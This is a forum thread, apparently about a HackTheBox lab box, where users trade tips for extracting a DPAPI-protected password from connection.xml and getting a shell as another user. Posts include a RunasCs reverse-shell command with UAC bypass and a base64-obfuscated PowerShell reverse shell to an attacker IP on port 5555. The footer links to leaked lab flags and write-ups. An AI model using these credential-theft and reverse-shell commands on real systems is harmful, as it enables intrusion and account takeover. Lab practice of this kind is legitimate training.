Possibly Related Threads…

xxxbfacc · 01-28-2024, 03:20 AM

Decrypting password is the way to go. Just using creds to start a session gets the wrong kind of session. Need things to be a bit more interactive if you want to debug. Though somehow I did get it to work without decrypting the password earlier…

query1338 · 01-28-2024, 03:57 AM

why is my runas command killed before I can get a shell?

asdfmonster · 01-28-2024, 04:08 AM

I am still stuck on decrypting alaanding password. Any tips? I tried converting base64/hex etc, john and hashcat. Not sure what to do with this.

Cmbrlnd · 01-28-2024, 04:18 AM

(01-28-2024, 12:31 AM)Art10n Wrote: I am stuck in the ysoserial exe , I don’t know how to run it in parrotOS.

Me too hahaha, can't get it working in Linux

fl00d777 · 01-28-2024, 04:22 AM

I got alaading's password from the file, but not able to use it to run a command as him, I've tried RunasCs.exe with "--bypass-uac", but I can't get it to work.

With this:
.\RunasCs.exe alaading f8gQ********** cmd.exe -r 10.10.X.X:5555 --bypass-uac
I can get it to reach out to my listener but connection drops immediately.

Can anyone share how they were able to do it?! plz!

asdfmonster · (This post was last modified: 01-28-2024, 04:39 AM by asdfmonster.)

(01-28-2024, 04:15 AM)ConnorDev Wrote:
(01-28-2024, 04:08 AM)asdfmonster Wrote: I am still stuck on decrypting alaanding password. Any tips? I tried converting base64/hex etc, john and hashcat. Not sure what to do with this.

https://book.hacktricks.xyz/windows-hard...web-config

edit: nevermind I figured out where to go from what you mentioned

r3d53v3n · 01-28-2024, 04:30 AM

That part was a little of a pain. Hope this helps. Trying to get to root but having some difficulties. Could use some help with that

https://jeffhicks.substack.com/p/getting...powershell - GET THE PASS

------------------------ GETTING CRED

PS C:\Users\sfitz\Documents> get-job -State running | select -skip 1 | stop-job | remove-job
PS C:\Users\sfitz\Documents> $cred = Import-Clixml connection.xml
PS C:\Users\sfitz\Documents> $cred

UserName Password
-------- --------
alaading System.Security.SecureString

PS C:\Users\sfitz\Documents> $cred.GetNetworkCredential().password
PASS

---------------------------------GETTING SHELL AS USER

SHELL PORT - 5555
PS C:\Users\sfitz\Documents> $username = 'alaading'
PS C:\Users\sfitz\Documents> $password = 'PASS'
PS C:\Users\sfitz\Documents> $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
PS C:\Users\sfitz\Documents> $credential = New-Object System.Management.Automation.PSCredential ($username, $securePassword)
PS C:\Users\sfitz\Documents> Invoke-Command -ComputerName localhost -Credential $credential -ScriptBlock {powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA5ADgAIgAsADUANQA1ADUAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA}

fl00d777 · 01-28-2024, 04:34 AM

(01-28-2024, 04:27 AM)asdfmonster Wrote:
(01-28-2024, 04:15 AM)ConnorDev Wrote:
(01-28-2024, 04:08 AM)asdfmonster Wrote: I am still stuck on decrypting alaanding password. Any tips? I tried converting base64/hex etc, john and hashcat. Not sure what to do with this.

https://book.hacktricks.xyz/windows-hard...web-config

I already have the shell into the site and logged in as sfitz, looking through the multiple web.config files doesn't reveal anything about decrypting alaanding pass, from what I saw. Did I miss something, is it in plaintext?

The password is encoded with DPAPI. You can recover the plaintext with a few simple powershell commands. Here's an article that should help you. ^_^
https://mcpmag.com/articles/2017/07/20/s...shell.aspx

chillywilly · 01-28-2024, 04:59 AM

$credential = Import-Clixml -Path "c:\users\sfitz\documents\connection.xml"
echo ($credential.UserName + ":" + $credential.GetNetworkCredential().Password)

shitblais · 01-28-2024, 05:24 AM

```
Privilege Name Description State
============================= ============================== ========
SeDebugPrivilege Debug programs Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
```
any hint ?

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	360	88,710	03-28-2026, 09:28 AM Last Post: catsweet
	[FREE] HTB-ProLabs APTLABS Just Flags	kewlsunny	23	2,348	03-28-2026, 03:30 AM Last Post: lulaladrow
	[MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot	htb-bot	87	7,490	03-27-2026, 07:22 PM Last Post: stn
	HTB Eloquia User and Root Flags - Insane Box	69646B	13	350	03-27-2026, 06:14 PM Last Post: vlxw
	HTB - ALL Challenges you Stuck in	osamy7593	2	646	03-27-2026, 04:24 PM Last Post: catsweet